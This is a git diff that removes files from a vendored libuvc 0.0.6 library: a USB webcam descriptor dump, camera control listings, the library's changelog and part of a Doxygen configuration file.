-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0a80  2x 640 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       8
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0b20  2x 800 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       9
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0be0  2x 992 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting      10
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x1380  3x 896 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting      11
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x13fc  3x 1020 bytes
-        bInterval               1
-    Interface Association:
-      bLength                 8
-      bDescriptorType        11
-      bFirstInterface         2
-      bInterfaceCount         2
-      bFunctionClass          1 Audio
-      bFunctionSubClass       2 Streaming
-      bFunctionProtocol       0 
-      iFunction               0 
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        2
-      bAlternateSetting       0
-      bNumEndpoints           0
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      1 Control Device
-      bInterfaceProtocol      0 
-      iInterface              0 
-      AudioControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      1 (HEADER)
-        bcdADC               1.00
-        wTotalLength           38
-        bInCollection           1
-        baInterfaceNr( 0)       3
-      AudioControl Interface Descriptor:
-        bLength                12
-        bDescriptorType        36
-        bDescriptorSubtype      2 (INPUT_TERMINAL)
-        bTerminalID             1
-        wTerminalType      0x0201 Microphone
-        bAssocTerminal          0
-        bNrChannels             1
-        wChannelConfig     0x0000
-        iChannelNames           0 
-        iTerminal               0 
-      AudioControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      3 (OUTPUT_TERMINAL)
-        bTerminalID             3
-        wTerminalType      0x0101 USB Streaming
-        bAssocTerminal          1
-        bSourceID               5
-        iTerminal               0 
-      AudioControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      6 (FEATURE_UNIT)
-        bUnitID                 5
-        bSourceID               1
-        bControlSize            1
-        bmaControls( 0)      0x03
-          Mute
-          Volume
-        bmaControls( 1)      0x00
-        iFeature                0 
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        3
-      bAlternateSetting       0
-      bNumEndpoints           0
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      2 Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        3
-      bAlternateSetting       1
-      bNumEndpoints           1
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      2 Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      AudioStreaming Interface Descriptor:
-        bLength                 7
-        bDescriptorType        36
-        bDescriptorSubtype      1 (AS_GENERAL)
-        bTerminalLink           3
-        bDelay                  1 frames
-        wFormatTag              1 PCM
-      AudioStreaming Interface Descriptor:
-        bLength                11
-        bDescriptorType        36
-        bDescriptorSubtype      2 (FORMAT_TYPE)
-        bFormatType             1 (FORMAT_TYPE_I)
-        bNrChannels             1
-        bSubframeSize           2
-        bBitResolution         16
-        bSamFreqType            1 Discrete
-        tSamFreq[ 0]        16000
-      Endpoint Descriptor:
-        bLength                 9
-        bDescriptorType         5
-        bEndpointAddress     0x86  EP 6 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0044  1x 68 bytes
-        bInterval               4
-        bRefresh                0
-        bSynchAddress           0
-        AudioControl Endpoint Descriptor:
-          bLength                 7
-          bDescriptorType        37
-          bDescriptorSubtype      1 (EP_GENERAL)
-          bmAttributes         0x01
-            Sampling Frequency
-          bLockDelayUnits         0 Undefined
-          wLockDelay              0 Undefined
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        3
-      bAlternateSetting       2
-      bNumEndpoints           1
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      2 Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      AudioStreaming Interface Descriptor:
-        bLength                 7
-        bDescriptorType        36
-        bDescriptorSubtype      1 (AS_GENERAL)
-        bTerminalLink           3
-        bDelay                  1 frames
-        wFormatTag              1 PCM
-      AudioStreaming Interface Descriptor:
-        bLength                11
-        bDescriptorType        36
-        bDescriptorSubtype      2 (FORMAT_TYPE)
-        bFormatType             1 (FORMAT_TYPE_I)
-        bNrChannels             1
-        bSubframeSize           2
-        bBitResolution         16
-        bSamFreqType            1 Discrete
-        tSamFreq[ 0]        24000
-      Endpoint Descriptor:
-        bLength                 9
-        bDescriptorType         5
-        bEndpointAddress     0x86  EP 6 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0064  1x 100 bytes
-        bInterval               4
-        bRefresh                0
-        bSynchAddress           0
-        AudioControl Endpoint Descriptor:
-          bLength                 7
-          bDescriptorType        37
-          bDescriptorSubtype      1 (EP_GENERAL)
-          bmAttributes         0x01
-            Sampling Frequency
-          bLockDelayUnits         0 Undefined
-          wLockDelay              0 Undefined
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        3
-      bAlternateSetting       3
-      bNumEndpoints           1
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      2 Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      AudioStreaming Interface Descriptor:
-        bLength                 7
-        bDescriptorType        36
-        bDescriptorSubtype      1 (AS_GENERAL)
-        bTerminalLink           3
-        bDelay                  1 frames
-        wFormatTag              1 PCM
-      AudioStreaming Interface Descriptor:
-        bLength                11
-        bDescriptorType        36
-        bDescriptorSubtype      2 (FORMAT_TYPE)
-        bFormatType             1 (FORMAT_TYPE_I)
-        bNrChannels             1
-        bSubframeSize           2
-        bBitResolution         16
-        bSamFreqType            1 Discrete
-        tSamFreq[ 0]        32000
-      Endpoint Descriptor:
-        bLength                 9
-        bDescriptorType         5
-        bEndpointAddress     0x86  EP 6 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0084  1x 132 bytes
-        bInterval               4
-        bRefresh                0
-        bSynchAddress           0
-        AudioControl Endpoint Descriptor:
-          bLength                 7
-          bDescriptorType        37
-          bDescriptorSubtype      1 (EP_GENERAL)
-          bmAttributes         0x01
-            Sampling Frequency
-          bLockDelayUnits         0 Undefined
-          wLockDelay              0 Undefined
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        3
-      bAlternateSetting       4
-      bNumEndpoints           1
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      2 Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      AudioStreaming Interface Descriptor:
-        bLength                 7
-        bDescriptorType        36
-        bDescriptorSubtype      1 (AS_GENERAL)
-        bTerminalLink           3
-        bDelay                  1 frames
-        wFormatTag              1 PCM
-      AudioStreaming Interface Descriptor:
-        bLength                11
-        bDescriptorType        36
-        bDescriptorSubtype      2 (FORMAT_TYPE)
-        bFormatType             1 (FORMAT_TYPE_I)
-        bNrChannels             1
-        bSubframeSize           2
-        bBitResolution         16
-        bSamFreqType            1 Discrete
-        tSamFreq[ 0]        48000
-      Endpoint Descriptor:
-        bLength                 9
-        bDescriptorType         5
-        bEndpointAddress     0x86  EP 6 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x00c4  1x 196 bytes
-        bInterval               4
-        bRefresh                0
-        bSynchAddress           0
-        AudioControl Endpoint Descriptor:
-          bLength                 7
-          bDescriptorType        37
-          bDescriptorSubtype      1 (EP_GENERAL)
-          bmAttributes         0x01
-            Sampling Frequency
-          bLockDelayUnits         0 Undefined
-          wLockDelay              0 Undefined
-Device Qualifier (for other device speed):
-  bLength                10
-  bDescriptorType         6
-  bcdUSB               2.00
-  bDeviceClass          239 Miscellaneous Device
-  bDeviceSubClass         2 ?
-  bDeviceProtocol         1 Interface Association
-  bMaxPacketSize0        64
-  bNumConfigurations      1
-Device Status:     0x0000
-  (Bus Powered)
diff --git a/thirdparty/libuvc-0.0.6/cameras/quickcampro9000_builtin_ctrls.txt b/thirdparty/libuvc-0.0.6/cameras/quickcampro9000_builtin_ctrls.txt
deleted file mode 100644
index 2b2969e..0000000
--- a/thirdparty/libuvc-0.0.6/cameras/quickcampro9000_builtin_ctrls.txt
+++ /dev/null
@@ -1,13 +0,0 @@
-Listing available controls for device video0:
-  Exposure, Auto Priority
-  Exposure (Absolute)
-  Exposure, Auto
-  Backlight Compensation
-  Sharpness
-  White Balance Temperature
-  Power Line Frequency
-  Gain
-  White Balance Temperature, Auto
-  Saturation
-  Contrast
-  Brightness
diff --git a/thirdparty/libuvc-0.0.6/cameras/quickcampro9000_extra_ctrls.txt b/thirdparty/libuvc-0.0.6/cameras/quickcampro9000_extra_ctrls.txt
deleted file mode 100644
index 205aaf6..0000000
--- a/thirdparty/libuvc-0.0.6/cameras/quickcampro9000_extra_ctrls.txt
+++ /dev/null
@@ -1,18 +0,0 @@
-Listing available controls for device video0:
-  Raw bits per pixel
-  Disable video processing
-  LED1 Frequency
-  LED1 Mode
-  Focus
-  Exposure, Auto Priority
-  Exposure (Absolute)
-  Exposure, Auto
-  Backlight Compensation
-  Sharpness
-  White Balance Temperature
-  Power Line Frequency
-  Gain
-  White Balance Temperature, Auto
-  Saturation
-  Contrast
-  Brightness
diff --git a/thirdparty/libuvc-0.0.6/changelog.txt b/thirdparty/libuvc-0.0.6/changelog.txt
deleted file mode 100644
index 1f569d1..0000000
--- a/thirdparty/libuvc-0.0.6/changelog.txt
+++ /dev/null
@@ -1,45 +0,0 @@
-Changes in 0.0.5 (2014-07-19)
-----------------
-
-New features:
- - Added support for all of the camera terminal and processing unit controls, including the controls
-   that appeared in UVC 1.1 and 1.5.
- - Added LIBUVC_VERSION_GTE(major, minor, patch) macro.
-
-Bug fixes:
- - Switching to explicit kernel driver detachment since auto_detach isn't available in libusb < 1.0.16.
- - The cmake module now looks for libuvc.dylib instead of libuvc.so on OS X.
-
-
-Changes in 0.0.4 (2014-06-26)
-----------------
-
-New features:
- - Support devices with multiple streaming interfaces and multiple concurrent streams.
-   A new uvc_stream* API is added, along with a uvc_stream_handle type to encapsulate the
-   state of a single UVC stream. Multiple streams can run alongside each other, provided
-   your USB connection has enough bandwidth. Streams can be individually stopped and
-   resumed; the old uvc_start/stop_streaming API is still provided as a convenient way
-   to interact with the usual one-stream devices.
- - Added support for MJPEG streams.
- - Added functions for checking/setting autofocus mode.
- - Added an interface to set/get arbitrary controls on units and terminals.
- - Made the input, output, processing and extension units public.
- - Implemented uvc_get_device and uvc_get_libusb_handle.
- - Add a library-owned flag to uvc_frame_t so that users may allocate their own frame buffers.
-
-Bug fixes:
- - Send frames as soon as they're received, not when the following frame arrives
- - Fixed call to NULL when no status callback is provided.
- - Fixed crash that occurred during shutdown if the USB device was disconnected during streaming.
-
-Miscellaneous improvements:
- - Hid the transfer method (isochronous vs bulk) from the user. This was never really
-   selectable; the camera's streaming interface supports either bulk or isochronous
-   transfers, so now libuvc will figure out which one is appropriate. The `isochronous`
-   parameter has been converted to a `flags` parameter, which is currently unused but
-   could be used to convey up to 7 bits of stream mode information in the future.
- - Improved the method for claiming the camera's interfaces.
- - Renamed UVC_COLOR_FORMAT_* to UVC_FRAME_FORMAT_*. The old #defines are still available.
- - Simplified format definition and lookup.
- - Improved transfer status (error) handling.
diff --git a/thirdparty/libuvc-0.0.6/doxygen.conf b/thirdparty/libuvc-0.0.6/doxygen.conf
deleted file mode 100644
index 226134a..0000000
--- a/thirdparty/libuvc-0.0.6/doxygen.conf
+++ /dev/null
@@ -1,2284 +0,0 @@
-# Doxyfile 1.8.5
-
-# This file describes the settings to be used by the documentation system
-# doxygen (www.doxygen.org) for a project.
-#
-# All text after a double hash (##) is considered a comment and is placed in
-# front of the TAG it is preceding.
-#
-# All text after a single hash (#) is considered a comment and will be ignored.
-# The format is:
-# TAG = value [value, ...]
-# For lists, items can also be appended using:
-# TAG += value [value, ...]
-# Values that contain spaces should be placed between quotes (\" \").
-
-#---------------------------------------------------------------------------
-# Project related configuration options
-#---------------------------------------------------------------------------
-
-# This tag specifies the encoding used for all characters in the config file
-# that follow. The default is UTF-8 which is also the encoding used for all text
-# before the first occurrence of this tag. Doxygen uses libiconv (or the iconv
-# built into libc) for the transcoding. See http://www.gnu.org/software/libiconv
-# for the list of possible encodings.
-# The default value is: UTF-8.
-
-DOXYFILE_ENCODING      = UTF-8
-
-# The PROJECT_NAME tag is a single word (or a sequence of words surrounded by
-# double-quotes, unless you are using Doxywizard) that should identify the
-# project for which the documentation is generated. This name is used in the
-# title of most generated pages and in a few other places.
-# The default value is: My Project.
-
-PROJECT_NAME           = libuvc
-
-# The PROJECT_NUMBER tag can be used to enter a project or revision number. This
-# could be handy for archiving the generated documentation or if some version
-# control system is used.
-
-PROJECT_NUMBER         =
-
-# Using the PROJECT_BRIEF tag one can provide an optional one line description
-# for a project that appears at the top of each page and should give viewer a
-# quick idea about the purpose of the project. Keep the description short.
-
-PROJECT_BRIEF          =
-
-# With the PROJECT_LOGO tag one can specify an logo or icon that is included in
-# the documentation. The maximum height of the logo should not exceed 55 pixels
-# and the maximum width should not exceed 200 pixels. Doxygen will copy the logo
-# to the output directory.
-
-PROJECT_LOGO           =
-
-# The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute) path
-# into which the generated documentation will be written. If a relative path is
-# entered, it will be relative to the location where doxygen was started. If
-# left blank the current directory will be used.
-
-OUTPUT_DIRECTORY       =
-
-# If the CREATE_SUBDIRS tag is set to YES, then doxygen will create 4096 sub-
-# directories (in 2 levels) under the output directory of each output format and
-# will distribute the generated files over these directories. Enabling this
-# option can be useful when feeding doxygen a huge amount of source files, where
-# putting all generated files in the same directory would otherwise causes
-# performance problems for the file system.
-# The default value is: NO.
-
-CREATE_SUBDIRS         = NO
-
-# The OUTPUT_LANGUAGE tag is used to specify the language in which all
-# documentation generated by doxygen is written. Doxygen will use this
-# information to generate all constant output in the proper language.
-# Possible values are: Afrikaans, Arabic, Brazilian, Catalan, Chinese, Chinese-
-# Traditional, Croatian, Czech, Danish, Dutch, English, Esperanto, Farsi,
-# Finnish, French, German, Greek, Hungarian, Italian, Japanese, Japanese-en,
-# Korean, Korean-en, Latvian, Norwegian, Macedonian, Persian, Polish,
-# Portuguese, Romanian, Russian, Serbian, Slovak, Slovene, Spanish, Swedish,
-# Turkish, Ukrainian and Vietnamese.
-# The default value is: English.
-
-OUTPUT_LANGUAGE        = English
-
-# If the BRIEF_MEMBER_DESC tag is set to YES doxygen will include brief member
-# descriptions after the members that are listed in the file and class
-# documentation (similar to Javadoc). Set to NO to disable this.
-# The default value is: YES.
-
-BRIEF_MEMBER_DESC      = YES
-
-# If the REPEAT_BRIEF tag is set to YES doxygen will prepend the brief
-# description of a member or function before the detailed description
-#
-# Note: If both HIDE_UNDOC_MEMBERS and BRIEF_MEMBER_DESC are set to NO, the
-# brief descriptions will be completely suppressed.
-# The default value is: YES.
-
-REPEAT_BRIEF           = YES
-
-# This tag implements a quasi-intelligent brief description abbreviator that is
-# used to form the text in various listings. Each string in this list, if found
-# as the leading text of the brief description, will be stripped from the text
-# and the result, after processing the whole list, is used as the annotated
-# text. Otherwise, the brief description is used as-is. If left blank, the
-# following values are used ($name is automatically replaced with the name of
-# the entity):The $name class, The $name widget, The $name file, is, provides,
-# specifies, contains, represents, a, an and the.
-
-ABBREVIATE_BRIEF       =
-
-# If the ALWAYS_DETAILED_SEC and REPEAT_BRIEF tags are both set to YES then
-# doxygen will generate a detailed section even if there is only a brief
-# description.
-# The default value is: NO.
-
-ALWAYS_DETAILED_SEC    = NO
-
-# If the INLINE_INHERITED_MEMB tag is set to YES, doxygen will show all
-# inherited members of a class in the documentation of that class as if those
-# members were ordinary class members. Constructors, destructors and assignment
-# operators of the base classes will not be shown.
-# The default value is: NO.
-
-INLINE_INHERITED_MEMB  = NO
-
-# If the FULL_PATH_NAMES tag is set to YES doxygen will prepend the full path
-# before files name in the file list and in the header files. If set to NO the
-# shortest path that makes the file name unique will be used
-# The default value is: YES.
-
-FULL_PATH_NAMES        = NO
-
-# The STRIP_FROM_PATH tag can be used to strip a user-defined part of the path.
-# Stripping is only done if one of the specified strings matches the left-hand
-# part of the path. The tag can be used to show relative paths in the file list.
-# If left blank the directory from which doxygen is run is used as the path to
-# strip.
-#
-# Note that you can specify absolute paths here, but also relative paths, which
-# will be relative from the directory where doxygen is started.
-# This tag requires that the tag FULL_PATH_NAMES is set to YES.
-
-STRIP_FROM_PATH        =
-
-# The STRIP_FROM_INC_PATH tag can be used to strip a user-defined part of the
-# path mentioned in the documentation of a class, which tells the reader which
-# header file to include in order to use a class. If left blank only the name of
-# the header file containing the class definition is used. Otherwise one should
-# specify the list of include paths that are normally passed to the compiler
-# using the -I flag.
-
-STRIP_FROM_INC_PATH    =
-
-# If the SHORT_NAMES tag is set to YES, doxygen will generate much shorter (but
-# less readable) file names. This can be useful is your file systems doesn't
-# support long names like on DOS, Mac, or CD-ROM.
-# The default value is: NO.
-
-SHORT_NAMES            = NO
-
-# If the JAVADOC_AUTOBRIEF tag is set to YES then doxygen will interpret the
-# first line (until the first dot) of a Javadoc-style comment as the brief
-# description. If set to NO, the Javadoc-style will behave just like regular Qt-
-# style comments (thus requiring an explicit @brief command for a brief
-# description.)
-# The default value is: NO.
-
-JAVADOC_AUTOBRIEF      = YES
-
-# If the QT_AUTOBRIEF tag is set to YES then doxygen will interpret the first
-# line (until the first dot) of a Qt-style comment as the brief description. If
-# set to NO, the Qt-style will behave just like regular Qt-style comments (thus
-# requiring an explicit \brief command for a brief description.)
-# The default value is: NO.
-
-QT_AUTOBRIEF           = NO
-
-# The MULTILINE_CPP_IS_BRIEF tag can be set to YES to make doxygen treat a
-# multi-line C++ special comment block (i.e. a block of //! or /// comments) as
-# a brief description. This used to be the default behavior. The new default is
-# to treat a multi-line C++ comment block as a detailed description. Set this
-# tag to YES if you prefer the old behavior instead.
-#
-# Note that setting this tag to YES also means that rational rose comments are
-# not recognized any more.
-# The default value is: NO.
-
-MULTILINE_CPP_IS_BRIEF = NO
-
-# If the INHERIT_DOCS tag is set to YES then an undocumented member inherits the
-# documentation from any documented member that it re-implements.
-# The default value is: YES.
-
-INHERIT_DOCS           = YES
-
-# If the SEPARATE_MEMBER_PAGES tag is set to YES, then doxygen will produce a
-# new page for each member. If set to NO, the documentation of a member will be
-# part of the file/class/namespace that contains it.
-# The default value is: NO.
-
-SEPARATE_MEMBER_PAGES  = NO
-
-# The TAB_SIZE tag can be used to set the number of spaces in a tab. Doxygen
-# uses this value to replace tabs by spaces in code fragments.
-# Minimum value: 1, maximum value: 16, default value: 4.
-
-TAB_SIZE               = 4
-
-# This tag can be used to specify a number of aliases that act as commands in
-# the documentation. An alias has the form:
-# name=value
-# For example adding
-# "sideeffect=@par Side Effects:\n"
-# will allow you to put the command \sideeffect (or @sideeffect) in the
-# documentation, which will result in a user-defined paragraph with heading
-# "Side Effects:". You can put \n's in the value part of an alias to insert
-# newlines.
-
-ALIASES                =
-
-# This tag can be used to specify a number of word-keyword mappings (TCL only).
-# A mapping has the form "name=value". For example adding "class=itcl::class"
-# will allow you to use the command class in the itcl::class meaning.
-
-TCL_SUBST              =
-
-# Set the OPTIMIZE_OUTPUT_FOR_C tag to YES if your project consists of C sources
-# only. Doxygen will then generate output that is more tailored for C. For
-# instance, some of the names that are used will be different. The list of all
-# members will be omitted, etc.
-# The default value is: NO.
-
-OPTIMIZE_OUTPUT_FOR_C  = YES
-
-# Set the OPTIMIZE_OUTPUT_JAVA tag to YES if your project consists of Java or
-# Python sources only. Doxygen will then generate output that is more tailored
-# for that language. For instance, namespaces will be presented as packages,
-# qualified scopes will look different, etc.
-# The default value is: NO.
-
-OPTIMIZE_OUTPUT_JAVA   = NO
-
-# Set the OPTIMIZE_FOR_FORTRAN tag to YES if your project consists of Fortran
-# sources. Doxygen will then generate output that is tailored for Fortran.
-# The default value is: NO.
-
-OPTIMIZE_FOR_FORTRAN   = NO
-
-# Set the OPTIMIZE_OUTPUT_VHDL tag to YES if your project consists of VHDL
-# sources. Doxygen will then generate output that is tailored for VHDL.
-# The default value is: NO.
-
-OPTIMIZE_OUTPUT_VHDL   = NO
-
-# Doxygen selects the parser to use depending on the extension of the files it
-# parses. With this tag you can assign which parser to use for a given
-# extension. Doxygen has a built-in mapping, but you can override or extend it
-# using this tag. The format is ext=language, where ext is a file extension, and
-# language is one of the parsers supported by doxygen: IDL, Java, Javascript,
-# C#, C, C++, D, PHP, Objective-C, Python, Fortran, VHDL. For instance to make
-# doxygen treat .inc files as Fortran files (default is PHP), and .f files as C
-# (default is Fortran), use: inc=Fortran f=C.
-#
-# Note For files without extension you can use no_extension as a placeholder.
-#
-# Note that for custom extensions you also need to set FILE_PATTERNS otherwise
-# the files are not read by doxygen.
-
-EXTENSION_MAPPING      =
-
-# If the MARKDOWN_SUPPORT tag is enabled then doxygen pre-processes all comments
-# according to the Markdown format, which allows for more readable
-# documentation. See http://daringfireball.net/projects/markdown/ for details.
-# The output of markdown processing is further processed by doxygen, so you can
-# mix doxygen, HTML, and XML commands with Markdown formatting. Disable only in
-# case of backward compatibilities issues.
-# The default value is: YES.
-
-MARKDOWN_SUPPORT       = YES
-
-# When enabled doxygen tries to link words that correspond to documented
-# classes, or namespaces to their corresponding documentation. Such a link can
-# be prevented in individual cases by by putting a % sign in front of the word
-# or globally by setting AUTOLINK_SUPPORT to NO.
-# The default value is: YES.
-
-AUTOLINK_SUPPORT       = YES
-
-# If you use STL classes (i.e. std::string, std::vector, etc.) but do not want
-# to include (a tag file for) the STL sources as input, then you should set this
-# tag to YES in order to let doxygen match functions declarations and
-# definitions whose arguments contain STL classes (e.g. func(std::string);
-# versus func(std::string) {}). This also make the inheritance and collaboration
-# diagrams that involve STL classes more complete and accurate.
-# The default value is: NO.
-
-BUILTIN_STL_SUPPORT    = NO
-
-# If you use Microsoft's C++/CLI language, you should set this option to YES to
-# enable parsing support.
-# The default value is: NO.
-
-CPP_CLI_SUPPORT        = NO
-
-# Set the SIP_SUPPORT tag to YES if your project consists of sip (see:
-# http://www.riverbankcomputing.co.uk/software/sip/intro) sources only. Doxygen
-# will parse them like normal C++ but will assume all classes use public instead
-# of private inheritance when no explicit protection keyword is present.
-# The default value is: NO.
-
-SIP_SUPPORT            = NO
-
-# For Microsoft's IDL there are propget and propput attributes to indicate
-# getter and setter methods for a property. Setting this option to YES will make
-# doxygen to replace the get and set methods by a property in the documentation.
-# This will only work if the methods are indeed getting or setting a simple
-# type. If this is not the case, or you want to show the methods anyway, you
-# should set this option to NO.
-# The default value is: YES.
-
-IDL_PROPERTY_SUPPORT   = YES
-
-# If member grouping is used in the documentation and the DISTRIBUTE_GROUP_DOC
-# tag is set to YES, then doxygen will reuse the documentation of the first
-# member in the group (if any) for the other members of the group. By default
-# all members of a group must be documented explicitly.
-# The default value is: NO.
-
-DISTRIBUTE_GROUP_DOC   = NO
-
-# Set the SUBGROUPING tag to YES to allow class member groups of the same type
-# (for instance a group of public functions) to be put as a subgroup of that
-# type (e.g. under the Public Functions section). Set it to NO to prevent
-# subgrouping. Alternatively, this can be done per class using the
-# \nosubgrouping command.
-# The default value is: YES.
-
-SUBGROUPING            = YES
-
-# When the INLINE_GROUPED_CLASSES tag is set to YES, classes, structs and unions
-# are shown inside the group in which they are included (e.g. using \ingroup)
-# instead of on a separate page (for HTML and Man pages) or section (for LaTeX
-# and RTF).
-#
-# Note that this feature does not work in combination with
-# SEPARATE_MEMBER_PAGES.
-# The default value is: NO.
-
-INLINE_GROUPED_CLASSES = NO
-
-# When the INLINE_SIMPLE_STRUCTS tag is set to YES, structs, classes, and unions
-# with only public data fields or simple typedef fields will be shown inline in
-# the documentation of the scope in which they are defined (i.e. file,
-# namespace, or group documentation), provided this scope is documented. If set
-# to NO, structs, classes, and unions are shown on a separate page (for HTML and
-# Man pages) or section (for LaTeX and RTF).
-# The default value is: NO.
-
-INLINE_SIMPLE_STRUCTS  = NO
-
-# When TYPEDEF_HIDES_STRUCT tag is enabled, a typedef of a struct, union, or
-# enum is documented as struct, union, or enum with the name of the typedef. So
-# typedef struct TypeS {} TypeT, will appear in the documentation as a struct
-# with name TypeT. When disabled the typedef will appear as a member of a file,
-# namespace, or class. And the struct will be named TypeS. This can typically be
-# useful for C code in case the coding convention dictates that all compound
-# types are typedef'ed and only the typedef is referenced, never the tag name.
-# The default value is: NO.
-
-TYPEDEF_HIDES_STRUCT   = NO
-
-# The size of the symbol lookup cache can be set using LOOKUP_CACHE_SIZE. This
-# cache is used to resolve symbols given their name and scope. Since this can be
-# an expensive process and often the same symbol appears multiple times in the
-# code, doxygen keeps a cache of pre-resolved symbols. If the cache is too small
-# doxygen will become slower. If the cache is too large, memory is wasted. The
-# cache size is given by this formula: 2^(16+LOOKUP_CACHE_SIZE). The valid range
-# is 0..9, the default is 0, corresponding to a cache size of 2^16=65536
-# symbols. At the end of a run doxygen will report the cache usage and suggest
-# the optimal cache size from a speed point of view.
-# Minimum value: 0, maximum value: 9, default value: 0.
-
-LOOKUP_CACHE_SIZE      = 0
-
-#---------------------------------------------------------------------------
-# Build related configuration options
-#---------------------------------------------------------------------------
-
-# If the EXTRACT_ALL tag is set to YES doxygen will assume all entities in
-# documentation are documented, even if no documentation was available. Private
-# class members and static file members will be hidden unless the
-# EXTRACT_PRIVATE respectively EXTRACT_STATIC tags are set to YES.
-# Note: This will also disable the warnings about undocumented members that are
-# normally produced when WARNINGS is set to YES.
-# The default value is: NO.
-
-EXTRACT_ALL            = NO
-
-# If the EXTRACT_PRIVATE tag is set to YES all private members of a class will
-# be included in the documentation.
-# The default value is: NO.
-
-EXTRACT_PRIVATE        = YES
-
-# If the EXTRACT_PACKAGE tag is set to YES all members with package or internal
-# scope will be included in the documentation.
-# The default value is: NO.
-
-EXTRACT_PACKAGE        = NO
-
-# If the EXTRACT_STATIC tag is set to YES all static members of a file will be
-# included in the documentation.
-# The default value is: NO.
-
-EXTRACT_STATIC         = YES
-
-# If the EXTRACT_LOCAL_CLASSES tag is set to YES classes (and structs) defined
-# locally in source files will be included in the documentation. If set to NO
-# only classes defined in header files are included. Does not have any effect
-# for Java sources.
-# The default value is: YES.
-
-EXTRACT_LOCAL_CLASSES  = YES
-
-# This flag is only useful for Objective-C code. When set to YES local methods,
-# which are defined in the implementation section but not in the interface are
-# included in the documentation. If set to NO only methods in the interface are
-# included.
-# The default value is: NO.
-
-EXTRACT_LOCAL_METHODS  = NO
-
-# If this flag is set to YES, the members of anonymous namespaces will be
-# extracted and appear in the documentation as a namespace called
-# 'anonymous_namespace{file}', where file will be replaced with the base name of
-# the file that contains the anonymous namespace. By default anonymous namespace
-# are hidden.
-# The default value is: NO.
-
-EXTRACT_ANON_NSPACES   = NO
-
-# If the HIDE_UNDOC_MEMBERS tag is set to YES, doxygen will hide all
-# undocumented members inside documented classes or files. If set to NO these
-# members will be included in the various overviews, but no documentation
-# section is generated. This option has no effect if EXTRACT_ALL is enabled.
-# The default value is: NO.
-
-HIDE_UNDOC_MEMBERS     = YES
-
-# If the HIDE_UNDOC_CLASSES tag is set to YES, doxygen will hide all
-# undocumented classes that are normally visible in the class hierarchy. If set
-# to NO these classes will be included in the various overviews. This option has
-# no effect if EXTRACT_ALL is enabled.
-# The default value is: NO.
-
-HIDE_UNDOC_CLASSES     = YES
-
